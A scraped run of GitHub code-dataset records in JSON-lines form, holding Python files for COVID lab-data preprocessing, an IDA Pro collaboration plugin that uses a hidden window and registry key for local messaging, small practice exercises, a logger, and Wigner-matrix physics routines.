'CBC: Leukocytes','CBC: Hemoglobin', 'CBC: Mean Corpuscular Volume (MCV)',\n 'Alanine Aminotransferase (ALT)','Blood Sodium',\n 'Prothrombin Time (INR)','Potassium Blood Level','Cholinesterase',\n 'CBC: Platelets','C-Reactive Protein (CRP)','Urea','Blood Creatinine',\n 'Blood Calcium','Blood Amylase','Activated Partial Thromboplastin Time (aPTT)',\n 'ABG: standard bicarbonate (sHCO3)','ABG: pH','ABG: PaO2','ABG: PaCO2','ABG: Lactic Acid',\n 'ABG: Base Excess','D-Dimer','Glycemia','ABG: Oxygen Saturation (SaO2)a','ABG: Oxygen Saturation (SaO2)b']\n\nLAB_COLS = ['PATIENT.ID','FECHA_PETICION.LAB_DATE','DETERMINACION.ITEM_LAB','RESULTADO.VAL_RESULT']\n\nLAB_FEATURES = ['PATIENT ID', 'Total Bilirubin','Aspartate Aminotransferase (AST)',\n 'CBC: Leukocytes','CBC: Hemoglobin', 'CBC: Mean Corpuscular Volume (MCV)',\n 'Alanine Aminotransferase (ALT)','Blood Sodium',\n 'Prothrombin Time (INR)','Potassium Blood Level','Cholinesterase',\n 'CBC: Platelets','C-Reactive Protein (CRP)','Blood Creatinine',\n 'Blood Calcium','Blood Amylase','ABG: standard bicarbonate (sHCO3)',\n 'ABG: pH','ABG: PaO2','ABG: PaCO2','ABG: Lactic Acid',\n 'ABG: Base Excess','D-Dimer','Glycemia','Blood Urea Nitrogen (BUN)','ABG: Oxygen Saturation (SaO2)']\n\nHCUP_LIST = [49,50,87,90,95,146]\n\n\nCREMONA_EXTRA = ['ABG: COHb', 'ABG: MetHb',\n 'Activated Partial Thromboplastin Time (aPTT)',\n 'CBC: Red cell Distribution Width (RDW)',\n 'Respiratory Frequency']\n\n\ndef missing_values_table(df):\n mis_val = df.isnull().sum()\n mis_val_percent = 100 * df.isnull().sum() / len(df)\n mis_val_table = pd.concat([mis_val, mis_val_percent], axis=1)\n mis_val_table_ren_columns = mis_val_table.rename(\n columns = {0 : 'Missing Values', 1 : '% of Total Values'})\n mis_val_table_ren_columns = mis_val_table_ren_columns[\n mis_val_table_ren_columns.iloc[:,1] != 0].sort_values(\n '% of Total Values', ascending=False).round(1)\n print (\"Your selected dataframe has \" + str(df.shape[1]) + \" columns.\\n\"\n \"There are \" + str(mis_val_table_ren_columns.shape[0]) +\n \" columns that have missing values.\")\n return mis_val_table_ren_columns\n\n\n\ndef create_dataset_admissions(admission):\n\n #Rename the columns for the admission\n admission = admission.rename(columns=RENAMED_ADMISSION_COLUMNS)\n\n #Limit to only patients for whom we know the outcome\n types = ['Fallecimiento', 'Domicilio']\n admission = admission.loc[admission['Outcome'].isin(types)]\n #Dictionary for the outcome\n death_dict = {'Fallecimiento': 1,'Domicilio': 0}\n admission.Outcome = [death_dict[item] for item in admission.Outcome]\n\n #Convert 
to Dates the appropriate information\n admission['Date_Emergency']= pd.to_datetime(admission['Date_Emergency']).dt.date\n admission['Date_Admission']= pd.to_datetime(admission['Date_Admission']).dt.date\n\n df1 = admission[ADMISSION_COLUMNS]\n\n return df1\n\n\ndef create_dataset_demographics(admission):\n #Rename the columns for the admission\n admission = admission.rename(columns=RENAMED_ADMISSION_COLUMNS)\n\n #Dictionary for the gender\n gender = {'MALE': 0,'FEMALE': 1}\n admission.Gender = [gender[item] for item in admission.Gender]\n\n df2 = admission[DEMOGRAPHICS_COLUMNS]\n return df2\n\n\ndef create_vitals_dataset(admission):\n #Rename the columns for the admission\n admission = admission.rename(columns=RENAMED_ADMISSION_COLUMNS)\n #Reformatting the vital values at the emergency department\n admission['Body Temperature'] = admission['Body Temperature'].replace('0',np.nan).str.replace(',','.').astype(float)\n #Convert to Fahrenheit\n admission['Body Temperature'] = fahrenheit_covert(admission['Body Temperature'])\n\n admission['Cardiac Frequency']=admission['Cardiac Frequency'].replace(0,np.nan)\n admission['SaO2']=admission['SaO2'].replace(0,np.nan)\n admission['Glycemia']=admission['Glycemia'].replace(0,np.nan)\n admission['Systolic Blood Pressure']=admission['Systolic Blood Pressure'].replace(0,np.nan)\n\n df3 = admission[VITAL_COLUMNS]\n\n df3 = remove_missing(df3)\n\n return df3\n\n\ndef create_lab_dataset(labs, dataset_admissions, dataset_vitals):\n\n labs['DETERMINACION.ITEM_LAB'] = labs['DETERMINACION.ITEM_LAB'].replace(RENAMED_LAB_MEASUREMENTS)\n\n #Limit to only rows for the ones known in Italy\n labs = labs.loc[labs['DETERMINACION.ITEM_LAB'].isin(LAB_METRICS)]\n #Reduce the number of columns\n labs = labs[LAB_COLS]\n\n #Convert to Date the date column\n labs['FECHA_PETICION.LAB_DATE']= pd.to_datetime(labs['FECHA_PETICION.LAB_DATE']).dt.date\n labs['RESULTADO.VAL_RESULT'] = labs['RESULTADO.VAL_RESULT'].str.extract('(\\d+(?:\\.\\d+)?)', expand=False).astype(float)\n\n #Convert to wide format\n df2 = labs.pivot_table(index=['PATIENT.ID','FECHA_PETICION.LAB_DATE'], columns='DETERMINACION.ITEM_LAB', values='RESULTADO.VAL_RESULT')\n df2=pd.DataFrame(df2.to_records())\n\n df2['PATIENT.ID'] = df2['PATIENT.ID'].astype(int)\n\n #Createe Blood Urea Nitrogen from Urea\n df2['Blood Urea Nitrogen (BUN)'] = df2['Urea']/2.14\n #Drop Urea\n df2 = df2.drop(columns=['Urea'])\n\n #Oxygen levels\n df2['ABG: Oxygen Saturation (SaO2)'] = df2['ABG: Oxygen Saturation (SaO2)a']\n\n for (index_label, row_series) in df2.iterrows():\n if np.isnan(df2['ABG: Oxygen Saturation (SaO2)'].iloc[index_label]) and dataset_vitals['PATIENT ID'].isin([row_series['PATIENT.ID']]).any():\n df2['ABG: Oxygen Saturation (SaO2)'].iloc[index_label] = dataset_vitals[dataset_vitals['PATIENT ID']==row_series['PATIENT.ID']]['SaO2'].iloc[0]\n\n df2 = df2.drop(columns=['ABG: Oxygen Saturation (SaO2)a','ABG: Oxygen Saturation (SaO2)b'])\n\n\n #Merge the two dataframes admissions and labs together.\n df3 = pd.merge(dataset_admissions, df2, how='inner', left_on=['PATIENT ID','Date_Emergency'], right_on=['PATIENT.ID','FECHA_PETICION.LAB_DATE'])\n #df4 = pd.merge(df1, df2, how='inner', left_on=['PATIENT ID','Date_Admission'], right_on=['PATIENT.ID','FECHA_PETICION.LAB_DATE'])\n df3 = df3.drop(columns=['PATIENT.ID','FECHA_PETICION.LAB_DATE'])\n\n dataset_lab_full = df3[LAB_FEATURES]\n dataset_lab_full = pd.DataFrame(dataset_lab_full.groupby(['PATIENT ID'], as_index=False).first())\n\n dataset_lab_full = 
remove_missing(dataset_lab_full)\n\n return dataset_lab_full\n\n\ndef prepare_dataset_comorbidities(comorbidities_emerg, comorbidities_inpatient):\n #Convert them to a long format\n comorb_long1=pd.melt(comorbidities_emerg,id_vars=['PATIENT ID'],var_name='DiagOrdering', value_name='values')\n comorb_long2=pd.melt(comorbidities_inpatient,id_vars=['PATIENT ID'],var_name='DiagOrdering', value_name='values')\n #Concatanate the two dataframes\n comorb_long = pd.concat([comorb_long1,comorb_long2])\n\n #We will treat all types of diagnoses the same\n comorb_long = comorb_long.drop(['DiagOrdering'], axis=1)\n #Remove NA values\n comorb_long=comorb_long.dropna()\n #Convert PATIENT ID to integer\n comorb_long['PATIENT ID'] = comorb_long['PATIENT ID'].astype(int)\n #Remove the dot from the values column\n comorb_long['values']= comorb_long['values'].str.replace(\".\",\"\")\n return comorb_long\n\ndef create_dataset_comorbidities(comorb_long, icd_category, dataset_admissions):\n\n #Load the diagnoses dict\n if icd_category == 9:\n icd_dict = pd.read_csv('analyzer/hcup_dictionary_icd9.csv')\n else:\n icd_dict = pd.read_csv('analyzer/hcup_dictionary_icd10.csv')\n\n #The codes that are not mapped are mostly procedure codes or codes that are not of interest\n icd_descr = pd.merge(comorb_long, icd_dict, how='inner', left_on=['values'], right_on=['DIAGNOSIS_CODE'])\n\n #Now we need to restrict to the categories for which we have italian data\n # cardiac arrhythmia -> 106\n # acute renal failure -> 145\n # chronic kidney disease -> 146\n # CAD, heart disease -> 90\n # diabetes -> 49, 50\n # hypertension -> 87\n\n #Create a list with the categories that we want\n comorb_descr = icd_descr.loc[icd_descr['HCUP_ORDER'].isin(HCUP_LIST)]\n\n #Limit only to the HCUP Description and drop the duplicates\n comorb_descr = comorb_descr[['PATIENT ID','GROUP_HCUP']].drop_duplicates()\n\n #Convert from long to wide format\n comorb_descr = pd.get_dummies(comorb_descr, prefix=['GROUP_HCUP'])\n\n #Now we will remove the GROUP_HCUP_ from the name of each column\n comorb_descr = comorb_descr.rename(columns = lambda x: x.replace('GROUP_HCUP_', ''))\n\n #Let's combine the diabetes columns to one\n comorb_descr['Diabetes'] = comorb_descr[[\"Diabetes mellitus with complications\", \"Diabetes mellitus without complication\"]].max(axis=1)\n\n #Drop the other two columns\n comorb_descr = comorb_descr.drop(columns=['Diabetes mellitus with complications', 'Diabetes mellitus without complication'])\n\n dataset_comorbidities = pd.DataFrame(comorb_descr.groupby(['PATIENT ID'], as_index=False).max())\n\n # Combine the comorbidities with the main filees\n dataset_comorbidities = pd.merge(dataset_admissions['PATIENT ID'], dataset_comorbidities, how='left', left_on=['PATIENT ID'], right_on=['PATIENT ID'])\n dataset_comorbidities = dataset_comorbidities.fillna(0)\n\n return dataset_comorbidities\n\n\ndef add_extra_features(dataset_admissions):\n\n dataset_extra = dataset_admissions['PATIENT ID'].to_frame()\n\n for i in CREMONA_EXTRA:\n dataset_extra[i] = np.nan\n return dataset_extra\n\ndef filter_patients(datasets):\n patients = datasets[0]['PATIENT ID'].astype(np.int64)\n\n # Get common patients\n for d in datasets[1:]:\n patients = d[d['PATIENT ID'].astype(np.int64).isin(patients)]['PATIENT ID'].unique()\n\n # Remove values not in patients (in place)\n for d in datasets:\n d.drop(d[~d['PATIENT ID'].astype(np.int64).isin(patients)].index, inplace=True)\n return patients\n\ndef fahrenheit_covert(temp_celsius):\n temp_fahrenheit = ((temp_celsius 
* 9)/5)+ 32\n return temp_fahrenheit\n\n","repo_name":"COVIDAnalytics/covid19_hypertensive_treatments","sub_path":"calculator/analyzer/loaders/hmfundacion/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"30031656937","text":"import idaapi\nimport ctypes\nimport win32api\nimport win32gui\nimport win32con\nimport winnt\nimport os\nimport struct\nimport constants\nimport shared\nfrom all_events import *\nimport time\n\ndef log(data):\n\tprint(\"[Integrator] \" + data)\n\ndef create_hidden_window():\n\twindow_handler = win32gui.CreateWindow(\"EDIT\", \"Integrator window hook\", 0, 0, 0, 0, 0, 0, 0, 0, None)\n\tif not window_handler:\n\t\traise Exception(\"Cannot create hidded window!\")\n\twin32gui.SetWindowLong(window_handler, win32con.GWL_WNDPROC, message_handler)\n\treturn window_handler\n\ndef insert_to_registery(window_handle):\n\tid_of_instance = struct.unpack(\">I\", os.urandom(4))[0]\n\ttry:\n\t\tkey = win32api.RegOpenKeyEx(win32con.HKEY_CURRENT_USER, constants.SUBMODULE_KEY, 0, win32con.KEY_ALL_ACCESS)\n\texcept Exception:\n\t\tkey = win32api.RegCreateKeyEx(win32con.HKEY_CURRENT_USER, constants.SUBMODULE_KEY, win32con.KEY_ALL_ACCESS, None, winnt.REG_OPTION_NON_VOLATILE, None)[0]\n\twin32api.RegSetValueEx(key, str(id_of_instance), 0, win32con.REG_SZ, str(window_handle))\n\treturn id_of_instance\n\t\n\ndef remove_key_from_reg(id_of_instance):\n\tkey = win32api.RegOpenKeyEx(win32con.HKEY_CURRENT_USER, constants.SUBMODULE_KEY, 0, win32con.KEY_ALL_ACCESS)\n\tif key:\n\t\twin32api.RegDeleteValue(key, str(id_of_instance))\n\ndef message_handler(window_handler, msg, wParam, lParam):\n\tif wParam == constants.SEND_DATA_TO_IDA: #pass\n\t\tcopy_data = ctypes.cast(lParam, constants.PCOPYDATASTRUCT)\n\t\tevent_data = json.loads(ctypes.string_at(copy_data.constants.lpData))\n\t\tevent_object = create_event_from_dict(event_data)\n\t\tlog(\"Received object: \" + str(event_data))\n\t\tevent_object.implement()\n\treturn True\n\ndef create_event_from_dict(json_dict):\n\tevent_id = json_dict[\"id\"]\n\tevent_data = json_dict[\"data\"]\n\tif event_id == constants.CHANGE_FUNCTION_NAME_ID:\n\t\treturn ChangeFunctionNameEvent(event_data[\"value\"], event_data[\"linear-address\"])\n\telif event_id == constants.CHANGE_GLOBAL_VARIABLE_NAME_ID:\n\t\treturn ChangeGlobalVariableNameEvent(event_data[\"linear-address\"], event_data[\"value\"], event_data[\"label-type\"])\n\telif event_id == constants.CHANGE_LABEL_NAME_ID:\n\t\treturn ChangeLabelNameEvent(event_data[\"linear-address\"], event_data[\"value\"])\n\telif event_id == constants.SET_COMMENT_ID:\n\t\treturn ChangeCommentEvent(event_data[\"linear-address\"], event_data[\"value\"], event_data[\"comment-type\"])\n\telif event_id == constants.CHANGE_TYPE_ID:\n\t\treturn ChangeTypeEvent(event_data[\"linear-address\"], event_data[\"variable-type\"])\n\telif event_id == constants.NEW_FUNCTION_ID:\n\t\treturn NewFunctionEvent(event_data[\"linear-address-start\"],event_data[\"linear-address-end\"])\n\telif event_id == constants.UNDEFINE_DATA_ID:\n\t\treturn UndefineDataEvent(event_data[\"linear-address\"])\n\telif event_id == constants.CHANGE_FUNCTION_START_ID:\n\t\treturn ChangeFunctionStartEvent(event_data[\"linear-address\"], event_data[\"value\"])\n\telif event_id == constants.CHANGE_FUNCTION_END_ID:\n\t\treturn ChangeFunctionEndEvent(event_data[\"linear-address\"], event_data[\"value\"])\n\telif event_id == 
constants.CREATE_STRUCT_ID:\n\t\treturn CreateStructEvent(event_data[\"name\"], event_data[\"id\"])\n\telif event_id == constants.CREATE_STRUCT_VARIABLE_ID:\n\t\treturn CreateStructVariableEvent(event_data[\"id\"], event_data[\"offset\"], event_data[\"variable-type\"])\n\telif event_id == constants.DELETE_STRUCT_VARIABLE_ID:\n\t\treturn DeleteStructVariableEvent(event_data[\"id\"], event_data[\"offset\"])\n\telif event_id == constants.DELETE_STRUCT_ID:\n\t\treturn DeleteStructEvent(event_data[\"id\"])\n\telif event_id == constants.CHANGE_STRUCT_NAME_ID:\n\t\treturn ChangeStructNameEvent(event_data[\"id\"], event_data[\"value\"])\n\telif event_id == constants.CREATE_ENUM_ID:\n\t\treturn CreateEnumEvent(event_data[\"name\"], event_data[\"id\"])\n\telif event_id == constants.CREATE_ENUM_ITEM_ID:\n\t\treturn CreateEnumItemEvent(event_data[\"id\"], event_data[\"name\"], event_data[\"value\"])\n\telif event_id == constants.DELETE_ENUM_ID:\n\t\treturn DeleteEnumEvent(event_data[\"id\"])\n\telif event_id == constants.CHANGE_ENUM_NAME_ID:\n\t\treturn ChangeEnumNameEvent(event_data[\"id\"], event_data[\"value\"])\n\telif event_id == constants.CHANGE_FUNCTION_HEADER_ID:\n\t\treturn ChangeFunctionHeaderEvent(event_data[\"linear-address\"], event_data[\"value\"])\n\telif event_id == constants.IDA_CURSOR_CHANGE_ID:\n\t\treturn IDACursorEvent(event_data[\"linear-address\"])\n\telif event_id == constants.EXIT_FROM_IDA_ID:\n\t\treturn ExitIDBEvent()\n\telif event_id == constants.START_IDA_ID:\n\t\treturn StartIDAEvent()\n\telif event_id == constants.CHANGE_STRUCT_MEMBER_NAME_ID:\n\t\treturn ChangeStructItemEvent(event_data[\"id\"], event_data[\"offset\"], event_data[\"value\"])\n\telif event_id == constants.DELETE_ENUM_MEMBER_ID:\n\t\treturn DeleteEnumMemberEvent(event_data[\"id\"], event_data[\"value\"])\n\nclass integrator(idaapi.UI_Hooks, idaapi.plugin_t):\n\tflags = idaapi.PLUGIN_HIDE | idaapi.PLUGIN_FIX\n\tcomment = \" \"\n\thelp = \" \"\n\twanted_name = \"Integrator\"\n\twanted_hotkey = \"\"\n\n\tdef run(self):\n\t\tpass\n\n\tdef init(self):\t\n\t\tself._window_handler = create_hidden_window()\n\t\tself._id = insert_to_registery(self._window_handler)\n\t\tlog(\"Created window\")\n\t\tshared.INTEGRATOR_WINDOW_ID = self._id\n\t\tshared.COMMUNICATION_MANAGER_WINDOW_ID = struct.unpack(\">I\", os.urandom(4))[0]\n\t\tshared.start_communication_manager()\n\t\ttime.sleep(1)\n\t\tshared.IS_COMMUNICATION_MANAGER_STARTED = True\n\t\tif shared.USERID != -1: #started.\n\t\t\tcommunication_manager_window_handler = constants.get_window_handler_by_id(shared.COMMUNICATION_MANAGER_WINDOW_ID)\n\t\t\tconstants.send_data_to_window(communication_manager_window_handler, constants.CHANGE_PROJECT_ID, json.dumps({\"project-id\": shared.PROJECT_ID}))\n\t\t\tconstants.send_data_to_window(communication_manager_window_handler, constants.CHANGE_USER, json.dumps({\"username\":shared.USERNAME, \"id\": shared.USERID, \"token\": shared.USER_TOKEN}))\n\n\t\treturn idaapi.PLUGIN_KEEP\n\n\tdef term(self):\n\t\tremove_key_from_reg(self._id)\n\t\tself._id = 0\n\t\t\ndef PLUGIN_ENTRY():\n\treturn integrator()\n","repo_name":"lolblat/IReal","sub_path":"integrator.py","file_name":"integrator.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"38615998386","text":"#for five or more words returns them reversed\n\ndef spin_words(sentence):\n # Your code goes here\n old_list = sentence.split()\n new_list = []\n for i in range(len(old_list)):\n 
if len(old_list[i]) > 4:\n reversed = old_list[i][::-1]\n new_list.append(reversed)\n else:\n new_list.append(old_list[i])\n\n return \" \".join(new_list)\n\nprint(spin_words(\"Hey fellow warriors\"))\n\n\n\n\n\n# spinWords( \"Hey fellow warriors\" ) => returns \"Hey wollef sroirraw\" \n# spinWords( \"This is a test\") => returns \"This is a test\" \n# spinWords( \"This is another test\" )=> returns \"This is rehtona test\"","repo_name":"suhel954/personal_projects","sub_path":"python_practice/codewars/spinning_words.py","file_name":"spinning_words.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5563043159","text":"class ContaCorrente:\n def __init__(self, codigo):\n self.codigo = codigo\n self.saldo = 0\n\n def depositar(self, valor):\n self.saldo += valor\n\n def __str__(self):\n return f'Código: {self.codigo} - Saldo: {self.saldo}'\n\n\nconta_do_gui = ContaCorrente(15)\nconta_do_gui.depositar(500)\n\nconta_da_dani = ContaCorrente(47685)\nconta_da_dani.depositar(500)\n\ncontas = [conta_do_gui, conta_da_dani]\nfor conta in contas:\n print(conta)\n\ncontas = [conta_do_gui, conta_da_dani, conta_do_gui]\nprint(contas[0])\n\n\ndef deposita_para_todas_as_contas(contas_a_receber, valor):\n for conta_a_receber in contas_a_receber:\n conta_a_receber.depositar(valor)\n\n\n# contas.insert(0, 70)\ndeposita_para_todas_as_contas(contas, 100)\nprint(conta_do_gui)\n\nguilherme = ('Guilherme', 37, 1981)\ndaniela = ('Daniela', 35, 1980)\n\nusuarios = (guilherme, daniela, ('João', 30, 1975))\n","repo_name":"tadeubdev/python-collections-listas-e-tuplas-na-alura","sub_path":"conta_corrente.py","file_name":"conta_corrente.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16346900773","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 28 18:52:58 2018\r\n\r\n@author: nit_n\r\n\"\"\"\r\n\r\nfrom math import sqrt\r\n\r\npart = input(str(\"what part would you like to do (a, b, or c)? 
\"))\r\n\r\n\r\nif part in ['a']:\r\n print(\"see derivation sheet\")\r\n \r\nif part in ['b']:\r\n \r\n # functions f and g, where a = 1 and b = 2\r\n def f(x,y):\r\n return y*(1 + x*x)\r\n def g(x,y):\r\n return 2/(1 + x*x)\r\n \r\n # counter, starting x and y values\r\n n = 0\r\n x = 1\r\n y = 1\r\n \r\n print(\"see derivation sheet\")\r\n while n < 5:\r\n n = n + 1\r\n xp = f(x,y)\r\n x = xp\r\n yp = g(x,y)\r\n y = yp\r\n print(\"n =\", n)\r\n print(\"x =\", x)\r\n print(\"y =\", y)\r\n print(\"------------------------\")\r\n \r\n print(\"does not converge\")\r\n \r\nif part in ['c']: \r\n \r\n# functions f and g, where a = 1 and b = 2\r\n def f(x,y):\r\n return sqrt((2 - y)/y)\r\n def g(x,y):\r\n return x/(1 + x*x)\r\n \r\n # counter, starting x and y values\r\n n = 0\r\n x = 1\r\n y = 1\r\n \r\n while n < 40:\r\n n = n + 1\r\n xp = f(x,y)\r\n x = xp\r\n yp = g(x,y)\r\n y = yp\r\n print(\"n =\", n)\r\n print(\"x =\", x)\r\n print(\"y =\", y)\r\n print(\"------------------------\")\r\n \r\n print(\"actual: x = 2, y = 0.4\")\r\n \r\n \r\n \r\n \r\n ","repo_name":"nrwade0/computational-physics","sub_path":"6/6_12_n_w.py","file_name":"6_12_n_w.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27619036289","text":"import click\n\n\nclass Logger():\n\n def __init__(self, name):\n self.name = name\n\n def log(self, message):\n click.echo(\n click.style(self.name + ' ', dim=True)\n + message\n )\n\n def warn(self, message):\n style = {'bg': 'blue', 'fg': 'white', 'bold': True}\n message = (\n click.style(self.name + ' ', dim=True)\n + click.style(' {} '.format(message), **style)\n )\n click.echo(message, err=True)\n\n def err(self, message):\n style = {'bg': 'red', 'fg': 'white', 'bold': True}\n message = (\n click.style(self.name + ' ', dim=True)\n + click.style(' {} '.format(message), **style)\n )\n click.echo(message, err=True)\n\n def prompt(self, message, **kwargs):\n message = (\n click.style(self.name + ' ', dim=True) + message\n )\n return click.prompt(message, **kwargs)\n","repo_name":"honzajavorek/foto","sub_path":"foto/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"12037569057","text":"# a=[1,2,3,4,5]\n# counter=0\n# for i in range(0,len(a)):\n# counter+=a[i]\n# print(a[i])\n# print(\"Total=\",counter)\n\n\n\ndef multi(list1):\n counter=1\n for i in range(0,len(list1)):\n counter*=list1[i]\n\n\n return counter\n \n\nlist1=[1,2,3,4,5]\nprint(multi(list1))","repo_name":"mohitsh7979/python_programming","sub_path":"sumoflist.py","file_name":"sumoflist.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23354651922","text":"\"\"\"\nThis file contains functions to compute wigner matrices used in wigner transform (power spectra to correlation functions) \nand wigner_3j matrices used in window function calculations. 
\n\"\"\"\n\nimport numpy as np\nfrom scipy.special import binom,jn,loggamma\nfrom scipy.special import eval_jacobi as jacobi\nfrom multiprocessing import Pool,cpu_count\nfrom functools import partial\nimport sparse\nfrom sympy import Integer\nfrom sympy import sqrt as sy_sqrt\nfrom sympy import exp as sy_exp\nfrom sympy import log as sy_log\n\nfrom mpmath import exp as mp_exp\nfrom mpmath import log as mp_log\nfrom sympy.physics.wigner import wigner_3j\n\n\ndef wigner_d(m1,m2,theta,l,l_use_bessel=1.e4):\n \"\"\"\n Function to compute wigner matrices used in wigner transforms.\n \"\"\"\n l0=np.copy(l)\n if l_use_bessel is not None:\n #FIXME: This is not great. Due to a issues with the scipy hypergeometric function,\n #jacobi can output nan for large ell, l>1.e4\n # As a temporary fix, for ell>1.e4, we are replacing the wigner function with the\n # bessel function. Fingers and toes crossed!!!\n # mpmath is slower and also has convergence issues at large ell.\n #https://github.com/scipy/scipy/issues/4446\n \n l=np.atleast_1d(l)\n x=l<l_use_bessel\n l=np.atleast_1d(l[x])\n k=np.amin([l-m1,l-m2,l+m1,l+m2],axis=0)\n a=np.absolute(m1-m2)\n lamb=0 #lambda\n if m2>m1:\n lamb=m2-m1\n b=2*l-2*k-a\n d_mat=(-1)**lamb\n d_mat*=np.sqrt(binom(2*l-k,k+a)) #this gives array of shape l with elements choose(2l[i]-k[i], k[i]+a)\n d_mat/=np.sqrt(binom(k+b,b))\n d_mat=np.atleast_1d(d_mat)\n x=k<0\n d_mat[x]=0\n\n d_mat=d_mat.reshape(1,len(d_mat))\n theta=theta.reshape(len(theta),1)\n d_mat=d_mat*((np.sin(theta/2.0)**a)*(np.cos(theta/2.0)**b))\n x=d_mat==0\n d_mat*=jacobi(k,a,b,np.cos(theta)) #l\n d_mat[x]=0\n \n if l_use_bessel is not None:\n l=np.atleast_1d(l0)\n x=l>=l_use_bessel\n l=np.atleast_1d(l[x])\n# d_mat[:,x]=jn(m1-m2,l[x]*theta)\n d_mat=np.append(d_mat,jn(m1-m2,l*theta),axis=1)\n return d_mat\n\ndef wigner_d_parallel(m1,m2,theta,l,ncpu=None,l_use_bessel=1.e4):\n \"\"\"\n Compute wigner matrix in parallel.\n \"\"\"\n if ncpu is None:\n ncpu=cpu_count()\n p=Pool(ncpu)\n d_mat=np.array(p.map(partial(wigner_d,m1,m2,theta,l_use_bessel=l_use_bessel),l))\n p.close()\n p.join()\n return d_mat[:,:,0].T\n\n# def wigner_d_recur(m1,m2,theta,l,l_use_bessel=1.e4): #FIX: Can use recursion reltion from Kilbinger+ 2017\n# dmat=np.zeros((len(theta),len(l)))\n# theta=theta.reshape(len(theta),1)\n# l=l.reshape(1,len(l))\n# d100=np.cos(theta)\n \n# A0=l*(2.*l-1.)\n\n# A0/=np.sqrt((l**2-m1**2)*(l**2-m2**2))\n# A1=d100-m1*m2*1.0/l/(l-1.)\n# A2=np.sqrt(((l-1)**2-m1**2)*((l-1)**2-m2**2))\n# A2/=(l-1)*(2*l-1)\n# il=0\n# for i in np.arange(len(l[0,:])):\n# if l[0,i]<np.absolute(m1) or l[0,i]<np.absolute(m2):\n# continue\n# if il<=2:\n# dmat[:,i]=wigner_d(m1,m2,theta,np.atleast_1d(l[0,i]),l_use_bessel=l_use_bessel)[:,0]\n# il+=1\n# else:\n# dmat[:,i]=A1[:,i]*dmat[:,i-1]-A2[0,i]*dmat[:,i-2]\n# dmat[:,i]*=A0[0,i]\n# return dmat\n\n\ndef log_factorial(n):\n return loggamma(n+1)\n\ndef Wigner3j(m_1, m_2, m_3,j_1, j_2, j_3): #Failed attempt to convert sympy function into numpy. Doesnot work at large ell because of numerical errors\n \"\"\"Calculate the Wigner 3j symbol `Wigner3j(j_1,j_2,j_3,m_1,m_2,m_3)`\n *Has problems due to rounding errors when numbers get large.*\n This function is inspired from implementation in\n sympy.physics.Wigner, as written by Jens Rasch.\n https://docs.sympy.org/latest/modules/physics/wigner.html\n\n We have modified the implementation to use log_factorial so as to\n avoid dealing with large numbers. 
This function also accepts\n j_1,j_2,j_3 as 1d arrays (can be of different size) and returns\n a sparse matrix of size n_1 X n_2 X n_3, where n_i is the length of j_i.\n m_i should be integer scalars.\n For sparse package, see https://pypi.org/project/sparse/\n\n Following from sympy implementation:\n The inputs must be integers. (Half integer arguments are\n sacrificed so that we can use numba.) Nonzero return quantities\n only occur when the `j`s obey the triangle inequality (any two\n must add up to be as big as or bigger than the third).\n\n Examples\n ========\n\n >>> from spherical_functions import Wigner3j\n >>> Wigner3j_log(2, 6, 4, 0, 0, 0)\n 0.186989398002\n >>> Wigner3j_log(2, 6, 4, 0, 0, 1)\n 0\n \"\"\"\n j_1=j_1.reshape(len(np.atleast_1d(j_1)),1,1)\n j_2=j_2.reshape(1,len(np.atleast_1d(j_2)),1)\n j_3=j_3.reshape(1,1,len(np.atleast_1d(j_3)))\n\n x0=np.logical_not(np.any([ j_1 + j_2 - j_3<0, #triangle inequalities\n j_1 - j_2 + j_3<0,\n -j_1 + j_2 + j_3<0,\n abs(m_1) > j_1+j_2*0+j_3*0, #|m_i|<j_i\n abs(m_2) > j_2+j_1*0+j_3*0,\n abs(m_3) > j_3+j_2*0+j_1*0\n ],axis=0))\n\n if (m_1 + m_2 + m_3 != 0 or x0.sum()==0):\n return np.zeros_like(j_1+j_2+j_3,dtype='float64')\n\n\n a={1:(j_1 + j_2 - j_3)[x0]}\n\n m_3 = -m_3\n\n log_argsqrt =( log_factorial(j_1 - m_1) +\n log_factorial(j_1 + m_1) +\n log_factorial(j_2 - m_2) +\n log_factorial(j_2 + m_2) +\n log_factorial(j_3 - m_3) +\n log_factorial(j_3 + m_3)\n )[x0]\n\n log_argsqrt+=(log_factorial(a[1]) +\n log_factorial(( j_1 - j_2 + j_3)[x0]) +\n log_factorial((-j_1 + j_2 + j_3)[x0]) - log_factorial((j_1+j_2+j_3)[x0]+ 1))\n\n log_ressqrt=0.5*log_argsqrt\n log_argsqrt=None\n\n# imin = max(-j_3 + j_1 + m_2, max(-j_3 + j_2 - m_1, 0))\n imin_t=(-j_3 + j_2 - m_1 +j_1*0 ).clip(min=0)[x0]\n imin = (-j_3 + j_1 + m_2 +j_2*0)[x0]\n imin[imin<imin_t]=imin_t[imin<imin_t]\n imin_t=None\n\n# imax = min(j_2 + m_2, min(j_1 - m_1, j_1 + j_2 - j_3))\n imax_t=(j_1 - m_1 + j_2*0+j_3*0)[x0]\n imax =(j_1 + j_2 - j_3)[x0]\n imax[imax>imax_t]=imax_t[imax>imax_t]\n imax_t=(j_2 + m_2 + j_1*0+j_3*0)[x0]\n imax[imax>imax_t]=imax_t[imax>imax_t]\n imax_t=None\n\n\n iis=np.arange(np.amin(imin), np.amax(imax) + 1) #no need to use x0 here. 
